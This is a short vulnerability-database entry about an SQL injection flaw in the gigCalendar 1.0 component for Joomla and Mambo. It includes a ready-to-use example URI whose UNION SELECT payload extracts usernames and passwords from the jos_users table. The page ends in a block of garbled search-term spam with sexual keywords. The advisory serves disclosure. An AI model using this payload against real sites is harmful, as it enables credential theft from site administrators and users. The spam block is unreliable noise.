about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla! and Mambo gigCalendar Component SQL Injection Vulnerability


Title Joomla! and Mambo gigCalendar Component SQL Injection Vulnerability
Published 2009-01-13-12:00AM
Updated 2009-01-14-04:52PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  boom3rang
Vulnerable  gigCalendar gigCalendar 1.0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 09:19:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.crazyl wetcircle maxcpm.inf gaGGED Sexy still www.nylona IIS6.0 maxcpm.inf sex Ponygaller kontol ari guest book 200 /compo bogdan alu sex maxcpm.inf php-nuke 2 www.0595ey ecomstatio dotsys.com ble for me www.sexo.c Momota xxx 1 sextv1.t vedio bp www.foxshu vidio sek Www.thresh www.proxoy 1 sextv1.t www.0595ey sex photo news for c maxcpm.inf zubin Sexsakila GET /galle 200 /compo OpenSSH_3. www.ltx8.c starzips.f www.yggzxx maxcpm.inf Www.pinkwo maxcpm.inf Wu-Ftpd posing sex malaysiase Dian GET /galle